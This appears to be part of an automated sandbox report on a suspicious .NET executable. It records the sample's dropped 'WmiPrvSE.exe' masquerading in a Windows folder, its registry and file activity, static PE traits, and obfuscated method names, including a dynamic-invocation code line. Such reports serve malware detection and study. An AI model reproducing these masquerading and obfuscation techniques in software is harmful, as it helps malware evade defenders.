Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Section loaded: appresolver.dll

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Directory created: C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe			Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Directory created: C:\Program Files\Windows Media Player\en-GB\6661cc8d955995			Jump to behavior

Source: 9D7RwuJrth.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9D7RwuJrth.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 9D7RwuJrth.exe

Static file information: File size 3408384 > 1048576

Source: 9D7RwuJrth.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x33fa00

Source: 9D7RwuJrth.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WmiPrvSE.exe, 00000020.00000002.2377306205.000000001C937000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WmiPrvSE.exe, 0000000E.00000002.2080168939.000000001C333000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb)) source: WmiPrvSE.exe, 00000020.00000002.2377306205.000000001C937000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WmiPrvSE.exe, 00000005.00000002.1883557439.000000001B05E000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.2078316070.000000001C240000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2476107167.000000001BB50000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2610951731.000000001CCD6000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2678331499.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2976792819.000000001B7AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Parse Translate Aliases.pdb source: WmiPrvSE.exe, 00000005.00000002.1885289399.000000001BFB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbI#` source: WmiPrvSE.exe, 0000000E.00000002.2080168939.000000001C333000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\GameBarPresenceWriter\WmiPrvSE.PDB N source: WmiPrvSE.exe, 00000020.00000002.2373276367.000000001C86F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *rlib.pdb=R source: WmiPrvSE.exe, 00000005.00000002.1886057893.000000001C072000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs

.Net Code: Type.GetTypeFromHandle(SSdXZnuGqnkO9uEoek7.JbcqLjl6QPn(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SSdXZnuGqnkO9uEoek7.JbcqLjl6QPn(16777245)),Type.GetTypeFromHandle(SSdXZnuGqnkO9uEoek7.JbcqLjl6QPn(16777259))})

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9B8847B1 pushad ; iretd	0_2_00007FFD9B8847B7
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9B8853C2 push edx; ret	0_2_00007FFD9B8853C5
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9B9E2561 push ecx; iretd	0_2_00007FFD9B9E2562
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9B9E5865 push es; retf	0_2_00007FFD9B9E5866
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BC40C59 push ebx; ret	0_2_00007FFD9BC40C6A
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BC40BD9 push ebx; ret	0_2_00007FFD9BC40BEA
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BC40D8D push ebp; ret	0_2_00007FFD9BC40D8E
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BC40CFC push esp; ret	0_2_00007FFD9BC40CFD
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BC40C95 push ebp; ret	0_2_00007FFD9BC40CAA
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9B8A47B1 pushad ; iretd	5_2_00007FFD9B8A47B7
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9B8A53C2 push edx; ret	5_2_00007FFD9B8A53C5
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9BA02561 push ecx; iretd	5_2_00007FFD9BA02562
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9BA05865 push es; retf	5_2_00007FFD9BA05866
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9BFF3C03 push cs; retf	5_2_00007FFD9BFF3C05
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 14_2_00007FFD9BAB53C2 push edx; ret	14_2_00007FFD9BAB53C5
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 14_2_00007FFD9BAB47B1 pushad ; iretd	14_2_00007FFD9BAB47B7
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9BAC53C2 push edx; ret	20_2_00007FFD9BAC53C5
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9BAC47B1 pushad ; iretd	20_2_00007FFD9BAC47B7
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAC8C54 push esi; iretd	26_2_00007FFD9BAC8C59
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAC5C26 push esi; iretd	26_2_00007FFD9BAC5C27
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAE419C push edx; retf	26_2_00007FFD9BAE593B
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAE592B push edx; retf	26_2_00007FFD9BAE593B
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAEC538 push edi; ret	26_2_00007FFD9BAEC5A6
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAB53C2 push edx; ret	26_2_00007FFD9BAB53C5
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAB47B1 pushad ; iretd	26_2_00007FFD9BAB47B7
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAD433A push ebp; iretd	26_2_00007FFD9BAD4358
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BC12561 push ecx; iretd	26_2_00007FFD9BC12562
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BC15865 push es; retf	26_2_00007FFD9BC15866
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9C205895 pushad ; ret	26_2_00007FFD9C205896
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9C20585E pushad ; ret	26_2_00007FFD9C20585F
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9C2058DA pushad ; ret	26_2_00007FFD9C2058DB

Source: 9D7RwuJrth.exe, oDRaHcqttXo2GhxBIid.cs	High entropy of concatenated method names: 'tFiqaG5riD', 'Ar7qNIa7Zu', 'KFTIe07dO6BuJSXR8oJj', 'AQOarl7dk9A3CGOrf10x', 'uXT8Z57dxd6NlgnJELVk', 'j7PqhXiS2s', 'xlRLDt7dN0GhvW6dkqwt', 'dd3Fhc7dEyMuFJJSB1vh', 'Y74Loa7dowVg3wEK42le', 'dhhk5f7daKQBbvdGN7Ij'
Source: 9D7RwuJrth.exe, RaAj14QMXkPUG9hZ7FK.cs	High entropy of concatenated method names: 'sDanCI7xaQvQjNGuWnGr', 'jiUTQN7xFI37VGprx0pa', 'hYkAdW7xoOvnxpwtn1ta', 'SSgGDGSckG', 'u0FHkM7xU9DPZGvrdUYm', 'YMHqX67xEWKORSGycVyt', 'WN8hd97xVKGjtyj8J4TG', 'q83tsd7xhDZ5VyH982DW', 'OyDm6d7xcZP46o7h1gRH', 'VkZ37Mmfh3'
Source: 9D7RwuJrth.exe, InUuEtki7f66nxvXPuj.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'T9tDv07p0Md6hTfY3VaR', 'T1tl1S7pRUvk4u7claZB', 'wcFaWE7p8WA2RFWFyFj0'
Source: 9D7RwuJrth.exe, UKF3tvLKSSQsELl8cQf.cs	High entropy of concatenated method names: 'DytLsErTA0', 'NeNLuGyABq', 'CJlLDKGtJM', 'y7tLzrxc0W', 'vCbC99GUCK', 'fwbC7F8uiV', 'WAGCqKbHes', 'twu3wP7n3ZChVgZuvWl1', 'HeVP807nj3y38T8O47kd', 'LoHM0I7nyI9uLKX3YjPD'
Source: 9D7RwuJrth.exe, SbWsqP28Yc34Xow1cyP.cs	High entropy of concatenated method names: 'iDO2Mr9ys9', 'PPoD6f7lE58cpgoohQWe', 'VHfAew7lVIuXrm5munw6', 'am6W8E7lUjkYxSFExB56', 'dIDxop7lh15hZmQJIYfh', 'H4nae67laf3Y3k80ka4k', 'VWcXbR7lNcevGwYDKP0P'
Source: 9D7RwuJrth.exe, drvULy0S1cfKKta1rZk.cs	High entropy of concatenated method names: 'oqA72PSt1fN', 'les0K3uy9X', 'lNK72eDseNN', 'Q3R8hp7a6CQJfW1pMh0V', 'SY2BQM7a1tpgwyK0Lm0q', 'ms8ang7aM3enVMYyYVUc', 'oy37qs7aIvNlHfCFooen', 'K7a8F77aWykm3N56vtG4', 'zqq0Jx7adwbMRecryL42', 'Qw6cC47aXs7peH0SOVuw'
Source: 9D7RwuJrth.exe, gjd9gX6MGPw85XjhCRs.cs	High entropy of concatenated method names: 'Isr66NOOXW', 'YSI61wfqch', 'qJj6WkWkqE', 'oyw6ddLBtv', 'dLh6XOiY4l', 'U4J60g7Vf6oED8x4CC60', 'KLjYsh7Vc1aZeJdR7jAd', 'JFblJy7VSV01j7G6eNlK', 'oj7UMI7VKiByEF73Xsv3', 'km2yRo7VpVaNQuXjWEVC'
Source: 9D7RwuJrth.exe, qhRDuPIEj8OQwjbdJRy.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'sdJIU9reUG', 'DQKIh2Ctq0', 'Dispose', 'D31', 'wNK'
Source: 9D7RwuJrth.exe, xpLLWxCaD029CiwpvcL.cs	High entropy of concatenated method names: 'ws0CgoXHmu', 'leLC5ZIl5G', 'AVdCsFUyLa', 'T2BAWP7JCqptvsAXEJen', 'J87nPr7J4eDeBdSp2nek', 'KtJ2AE7JLflsVihMvQVl', 'GpoRT67JbOGAOLuuJr35', 'TYdCEXeEHl', 'nqxCVvA9QF', 'S2HCUYn4Xp'
Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs	High entropy of concatenated method names: 'CdrWDX7sKsUQIxX76lbr', 'AlgJut7spTQf5mB524jY', 'ciHswYrSNF', 'k9An1p7s5VcTRrAjfJ4D', 'gbeuPy7ssD8OkLo1dO1C', 'RSIp3c7su8n65jWYu6wd', 'N0UoKi7sD4faydG3c79A', 'mdKrtO7szscQ4H7qR6rQ', 'Eve9PT7u95wMaonOjoGu', 'MEailr7u7wwKne3So35a'
Source: 9D7RwuJrth.exe, UTTdM4F56WROA0D4ZLR.cs	High entropy of concatenated method names: 'CjXFuYTXJM', 'A3OFDDUlhH', 'C3tFzVG0qq', 'JO7o9Cm9Fo', 'Bpyo7gjOO9', 'pFeoq4KKkI', 'Fu5oTM6Um0', 'UNKo47iaBr', 'Ib7oL6g6jd', 'MmcoCBftMs'
Source: 9D7RwuJrth.exe, anQ86Xmw0MJpVEbITbp.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'Be072yl4jLT', 'Qdr74ULLCMc', 'XQfskm7omr2aq9xiD6To', 'CmLd137o0mrgp6hDYgCk', 'ATSHCF7oRQCw3gu9layx', 'ik4xRC7o8dKEU739C3Ll', 'Vp1hyR7or62M5qkIx2nM'
Source: 9D7RwuJrth.exe, k01UmvAVyjR0gVOdLFn.cs	High entropy of concatenated method names: 'iVqAhiqvsy', 'v8EAcfRnPa', 'H1WAS80Qec', 'pYiAfEYIOK', 'kFgAKmytow', 'd0crt17SOcGUVBOATBqH', 'M47lU67SFY62vyXlYiwV', 'YhyVIL7SofAUgiSa2NdG', 'dmqra87SkSniVQG6VdbZ', 'ctSd9p7SxCFjCaT3lOpN'
Source: 9D7RwuJrth.exe, njuTe91tBuGBeZStDLw.cs	High entropy of concatenated method names: 'method_0', 'kL51Jar7kS', 'jyL1lkthVy', 'Jiu1iaNHsB', 'NC31k6n02N', 'jsV1xoicpp', 'hnH1On2Fb4', 'xbfQTM7UG74TFPD6IqZj', 'pkMx5g7U3a6tNhqxL5jx', 'cBFeJa7UjI7twQnPDndC'
Source: 9D7RwuJrth.exe, W7PGLAClpiEOFs8TmXn.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'ysF72H0QqNT', 'LGc747LGLGo', 'Pc16tj7nVCXnqFhIlORa', 'M3Jvyn7nUCIZHsnc5DA9', 'jbixyb7nhhDJMGWZ7yRh'
Source: 9D7RwuJrth.exe, EHbwWX59PsqrZOH7AyG.cs	High entropy of concatenated method names: 'WPi54ZRQXu', 'pyG5LgZhdi', 'rwxZM57sdqlkupTZOWD6', 'CfDXCn7sXoDZ81EL42aj', 'Nl44qc7s1a5s6ejCTSN3', 'IxYhdy7sWMikt4MUXhdo', 'pbJWal7sAtm0hKHuh8jm', 'pqIZBt7stIbCujRMK71T', 's2A5qxcxAZ', 'wEY0Jv7srVboMf5UuyCp'
Source: 9D7RwuJrth.exe, KBZBiLqfh6mft0q2COo.cs	High entropy of concatenated method names: 'RG6TbVBwCs', 'dh336P7dzdeUI5RwmFdU', 'fwA6xQ7X9EBi0HJlgsdm', 'AtPIVC7X721X5P0m80hr', 'uF2wLU7XqFf6qyJqyPsa', 'wL3L7e7duCd4SVBjQgvA', 'EC6pgm7dDEvFsEwILCeD', 'rHaMad7XTrP7jmc3Bd8F', 'fw5T9nAMW4', 'zbaTqSrnWF'
Source: 9D7RwuJrth.exe, al77XBLE6MX4lq6ZbCY.cs	High entropy of concatenated method names: 'UZhLSYG9Nx', 'cS5ubN7nq58ytIwHLZrB', 'KxRI5j7nTAniNQA1VJ5a', 'CrXufb7n4Yb1c7dj6xiu', 'w01gC67nLLpw0Al6OQUk', 'U1J', 'P9X', 'D9774joXlpw', 'rSL74Phv8k9', 'btt72blUkLY'
Source: 9D7RwuJrth.exe, JtZZY1XoxmmpiE9PuOT.cs	High entropy of concatenated method names: 'kCYXNHgowZ', 'ECCXEfUCQA', 'D4eXVInad0', 'xQbXUOjyr7', 'udrXhgNVwF', 'mXbXcU3bU4', 'Hp5XSG4yuD', 'nDPXfEQ1vr', 'HG9XKH4REO', 'aiUXp77Pcv'
Source: 9D7RwuJrth.exe, SZ51ujMH4gh69O5wV9n.cs	High entropy of concatenated method names: 'D0gMt7NaC9', 'hAcMBrGUMP', 'XRyMy2nNoZ', 'wYwMGoZOuD', 'zN3M3Q2tcH', 'kYBMj3cTGR', 'IwNMPG1oAJ', 'hjxMeENXKV', 'GNhMY3CULT', 'HQVMmm9ycg'
Source: 9D7RwuJrth.exe, Hynb8Z7Gs2iQlRwb48c.cs	High entropy of concatenated method names: 'fIu7jhFv0K', 'LSF7PACdUo', 'l0l7ehOMpM', 'r6SKlM7W0YjYfx4yq4sX', 'vgHRVB7WYbPNODyCtDxX', 'Cg6KbR7WmCTUuQWyHhLO', 'TVRVf07WR8NNIVfXw1jh', 'wKswGg7W8GdDKIr8qJwG', 'H6v3pv7Wr7QhFAwO2K3o'
Source: 9D7RwuJrth.exe, y5l0ZeOVv2Ry1fjaaxm.cs	High entropy of concatenated method names: 'mJ772IqZYfJ', 'GtOOhI8Igl', 'Ce0OcVcRbt', 'ub8OSLqKWI', 'cYxx1v7wGOevmGwyfl9h', 'ygJ13X7w3pughN7fS9jP', 'PBhfQe7wjxAY6pGvsGd9', 'uKSytv7wP649kW8WLF2j', 'PIGxMC7we8rt7O1kZ7dQ', 'VbwiP27wY9qfEddfkxDY'
Source: 9D7RwuJrth.exe, s5S2BWT1mOW6JbYohtv.cs	High entropy of concatenated method names: 'cvVTNbpYMY', 'PiTTETlanP', 'tkOTVbuLuu', 'xwv83E7XUo9Hxx6ZCZ8M', 'qxYhgl7XhcmLljuVJNQZ', 'VAE2P77XEy8txfjp3J6Z', 'VqNgn47XVPg26kwV4409', 'cXsTdi1e3K', 'lkQTXGHlRm', 'uqqTANTpTM'
Source: 9D7RwuJrth.exe, uB0MamgtLJk9nkvBLKQ.cs	High entropy of concatenated method names: 'pQSgJpIyU7', 'TeaglwsVvK', 'tO8gi0mJRp', 'DTfgkd90kI', 'Dispose', 'wrZAAB75zppNchSVYIwv', 'MRUx437s9nZdXoKkRi2u', 'eWBNhi7s7ZhIlkTkvfoB', 'dgJMJW7sq4f1h1wXUvbC', 'Wnc0QW7sTVlbcBVJsyE5'
Source: 9D7RwuJrth.exe, xReAprdpsdYoi4qcXsD.cs	High entropy of concatenated method names: 'RfJdvM4Yc5', 'r5AdgqC9Lm', 'jPWd5vhw60', 'l5HdsOf7Q6', 'H6bduqmWoV', 'dFiuRr7hNAJwfxgYhjLG', 'KXEa7K7hEGlms5TgUIvn', 'GpQ2337hVqNXmt3qDANA', 'TFbsN37hUH1qdEE76x4b', 'vpJfKr7hhhtqBCp8oawr'
Source: 9D7RwuJrth.exe, lPhCVPWTBXxTjl5eFnb.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'CmoWLD1Or2', 'Write', 'OQ9WC4Bt7X', 'wOQWbpHIAP', 'Flush', 'vl7'
Source: 9D7RwuJrth.exe, qyldEDJfeZKUBhcexWx.cs	High entropy of concatenated method names: 'OJ2Jpjf2XB', 'k6r', 'ueK', 'QH3', 'QjPJwGqByP', 'Flush', 'PlBJvSM9ah', 'e5JJgnVEZV', 'Write', 'ttbJ5ojwRB'
Source: 9D7RwuJrth.exe, RmYdWV4nhws6ZiMUBNk.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'uYE7249VBt9', 'LGc747LGLGo', 'Kj2vuV7Ai385XkcusBhP', 'dTlWIB7AkZVCZd5q5FV2', 'vIrDye7AxgVfx9EvWUsb', 'LHJFR17AOHbRk7Pt0Yds', 'yH6ZD87AFtk2ayQZUvr6'
Source: 9D7RwuJrth.exe, a9uBubmd9paahNPlP9E.cs	High entropy of concatenated method names: 'vkqmkwg7r8', 'QcrKe77o759pk4Lte0ta', 'twasyM7FzeL0bDeDHkNJ', 'nKaYNX7o9yaT31hQ9vwp', 'TYkyOy7oq0xNenpXIE79', 'DOHmA8GkxL', 'rhumtMs84y', 'tugmnBoqb2', 'ayKT1S7FsPDSd2SpwNsq', 'XKa9F17FgdZVrbcImYKx'
Source: 9D7RwuJrth.exe, qil0lEdDCqJTnlfbfOl.cs	High entropy of concatenated method names: 'sl4X96bc0k', 'EJeX75k7bh', 'FUQXqqY4LC', 'SWNXTOJ75l', 'HyhX450krC', 'lQVXLDNnw9', 'yR0Bn97hwuhiXWtBkbKV', 'MgXkSd7hKK8HxUc80q9o', 'OTCn007hpNcxy8iZ0yHJ', 'hSnUm77hvaC9RsF2REGU'
Source: 9D7RwuJrth.exe, Ys7FTlWaLOPH7Yd9LHR.cs	High entropy of concatenated method names: 'TYGWukPTNv', 'CEJWzX5gyE', 'VyaWERNhpA', 'acDWV7TO4O', 'xQJWUEYO0R', 'CJEWhAo63e', 'syPWcp5yLT', 'HadWSxG9gI', 'CoYWfJDJb7', 'lWRWKnLHjC'
Source: 9D7RwuJrth.exe, orFB3JzXKx8JTss06L.cs	High entropy of concatenated method names: 'Xlb77JixZ3', 'EDK7T7fcRp', 'C7674EY1Lq', 'XKJ7LI8M40', 'NsB7C6YScr', 'iRF7bIPmtM', 'aXS7QIgVxG', 'ByVj4y7WHM4nQE3ZURBP', 'kawa2i7WZ2I57nql2BSu', 'DiaoSa7WB2c3i34S1G4J'
Source: 9D7RwuJrth.exe, PbMNL3wxUlg7eTC62nW.cs	High entropy of concatenated method names: 'gpx721EpVOW', 'PL57C64k62V', 'ylEh6I7gKRr0rKY3HTIv', 'Wq7et57gScb5w8RvEpkj', 'zCCNoo7gfKBcLOngUiMq', 'qOZ9VU7gpiilaGwQgikq', 'C6uWd67g56I4raqNgo6C', 'u9f4k77gv8KPGxY3veK5', 'guP6IV7ggAU8KfgbcJOO', 'mBcdeA7gs3ktHT9WahMQ'
Source: 9D7RwuJrth.exe, dJA0w9t2Q1GyTPWLo3c.cs	High entropy of concatenated method names: 'B0MtHLh3S2', 'noGtZ6CuY6', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'o8YtBrgse4', 'method_2', 'uc7'
Source: 9D7RwuJrth.exe, jN9uYrQGLDqCJTaJkUr.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'gKTHfK7iF43Ij92LN3Xu', 'vO14mF7ioOyiY2YgFLNg', 'DRHiR07iasGuAAaujye7', 'KKyJ7Y7iN97vwPyxLr7L'
Source: 9D7RwuJrth.exe, ETELfIOtjB5vEW7KKMb.cs	High entropy of concatenated method names: 'BfuOJ8XaF2', 'gSWOlVPKt0', 'HnYOiBpnp9', 'KuAOkTRGNn', 'aFnOxmoJTk', 'SfJOOBhncB', 'UxTOFel6Uh', 'sHDOoEEu8k', 'usjOaJPcrF', 'NN6ONglqAr'
Source: 9D7RwuJrth.exe, Bp932glfIliCvt5qYAr.cs	High entropy of concatenated method names: 'BvBZkm7KuQIaq9nxXnGy', 's0ogcb7K5o5NnEuwLPup', 'wG7nS37KsXZR5LlnEEHG', 'L5D0w77KD3pYIjFdAdn7', 'RaelpSZilw', 'Mh9', 'method_0', 'd9clw0L2AE', 'AsWlvLXA90', 'J3Klg24Zq0'
Source: 9D7RwuJrth.exe, hqeaiKTfj8XMsYbw0XD.cs	High entropy of concatenated method names: 'Yhk4TfMdi0', 'bYE44gp3Ab', 'uUQ4LN5fBA', 'P3WIyx7ALWPRwWFkXrZV', 'CmWUQy7ACOFBbwtWtvqI', 'mpPmp47AT0OoixXBGisA', 'cKu8fD7A46HTUZCK1HjD', 'l1i4ZBNLiv', 'qw0hIC7AHKbL7SrrM3Xt', 'ds7OhN7A2OfimoUnv4RG'
Source: 9D7RwuJrth.exe, T7VNMkADoG6p7I03w69.cs	High entropy of concatenated method names: 'FHGt9fUIus', 'h3Tt7MUGsj', 'Yd7', 'XBitqgYf5s', 'DCJtT1me6I', 'yEyt4JgJpO', 'RKRtLq18ob', 'BjXSEZ7SS1wl44FiiIqh', 'hIDW527SfxRnRS4GIoM0', 'DUpyQY7SKSmhH8yuyMBG'
Source: 9D7RwuJrth.exe, bJEKfk0G06Vne29gi37.cs	High entropy of concatenated method names: 'qv700oobgI', 't7I8iI7owqvBjvdEcbMQ', 'W0YH227ovanT9GAxJ4TY', 'T6UOFH7oK8dO2AISG7PC', 'NsUgGJ7opYIIYoVQmxxo', 'S9hiBb7og0pYWdi2hpT0', 'cwK0jFNkMC', 'TCFNXq7oEtRhtQJxPirQ', 'oJKq7j7oVPchg5Sw4pgg', 'iT5pF37oUduPrQ8VBV49'
Source: 9D7RwuJrth.exe, jphCFHbtC6HDk22rCS4.cs	High entropy of concatenated method names: 'QvXbJ4cdM0', 'C5WblSXXm6', 'QrfR4h7JwIS8mwXeJSmi', 'dCCWbg7JKp2ZYHDhRohr', 'BTkUps7JpSN04fAq7GxO', 'K3Zy8j7JvyA8hvoixAsu', 'CMrmQQ7JgHHdFK36FF0d', 'Gulqdd7J5ptZJNxcoPyu', 'qJOPZT7JsnghKNOPD1fo', 'htA3pM7JuSvHksJTAxLy'
Source: 9D7RwuJrth.exe, b2752hOQWlZFvCj9ovC.cs	High entropy of concatenated method names: 'auYOIRZ4eG', 'QOQpoa7w9xCCluEgYrUe', 'XZAc667pDXWZRkevusQs', 'UvtydV7pzsR4gr7Vk6HT', 'GL3jIx7w7jVPYhkhIyjR', 'VTAiaq7wqdTNupl5wi54', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 9D7RwuJrth.exe, Q8hQXXbksfM0tZIjpyK.cs	High entropy of concatenated method names: 'P9X', 'vmethod_0', 'lFq74MbHdf6', 's8372Z6UqDf', 'imethod_0', 'xdBCII7l7vn1DjkhdXcv', 'GUsqSH7JzgM8i4G32xRm', 'dCCY5a7l9ugBTCIWrfPZ', 'TMqCmQ7lqD6Ym5wrYRgY', 'eXVlKM7lTZ08siO8aKiH'
Source: 9D7RwuJrth.exe, Nb4skt4FotxhAxbVCcB.cs	High entropy of concatenated method names: 'K2u4u9GD2V', 'PINL0a7tCph4StqBsvTp', 'BBIbBh7tb8gkyrBQPbcJ', 'tKuwGC7t4GBMQjZrPTCv', 'Ec8iOG7tLCC5KwhbgIA6', 'G8hyfi7tQRyrJDKhrFw3', 'f5ZNeT7tHDlJo4jJmN5O', 'x07LCjKLvb', 'KeQ2777tGFb4GMpbVmDp', 'IgggA87tBD8GUaXiSZjD'
Source: 9D7RwuJrth.exe, krkLV6bmP3s4LPHH98q.cs	High entropy of concatenated method names: 'HdQbdIse9p', 'qtbZQU7JUpsuk4dWyhRR', 'R67XO57JhnE7nvGcnvMn', 'DgepDb7JEni2hYiBQcTt', 'tRXe167JVKKfxtk2y0qM', 'T3MJTc7Jc5yBjVZycEp3', 'wgQo057JSU87BeuakPmL', 'YoWbRNkba6', 'pCnb8wS74I', 'LFEbrlLeqr'
Source: 9D7RwuJrth.exe, wumMPpmOT2SGDRGb3mL.cs	High entropy of concatenated method names: 'vFNmUGbCA4', 'qfomh3PZwn', 'n50mc18nIC', 'vEy2np7oZUpAT772PWOs', 'K41fPs7oBSJJBvFNN893', 'g1y2ds7oQP3pMw0cSOZj', 'ykWZE57oHaa1CJerMgeK', 'MyRmocZUWp', 'pofmagydIU', 'jbBmNPFCJl'
Source: 9D7RwuJrth.exe, VhxqrbuFeo8aPFZOSWl.cs	High entropy of concatenated method names: 'cpf7CnV2OFk', 'D557CJxpC7B', 'JyV7ClWElo1', 'Fqf7CiZ5eRo', 'sfn7CkjnkP0', 'ytx7CxclLwx', 'BeX7CORYsmb', 'kWkDLQIoZa', 'foN7CFSvkEb', 'X1V7Co9jvFK'
Source: 9D7RwuJrth.exe, CFFe8gQqkfVPL27tei7.cs	High entropy of concatenated method names: 'KDnQ4Bajr4', 'B6bQLnChGe', 'eQaQCBqZEt', 'd7hQbnGKpy', 'VqUQ2BoH6y', 'YboQQMWgJ9', 'sZrQHposWY', 'RRTQZ171y4', 'zKHQBTR2yS', 'RRuQy9ayHV'
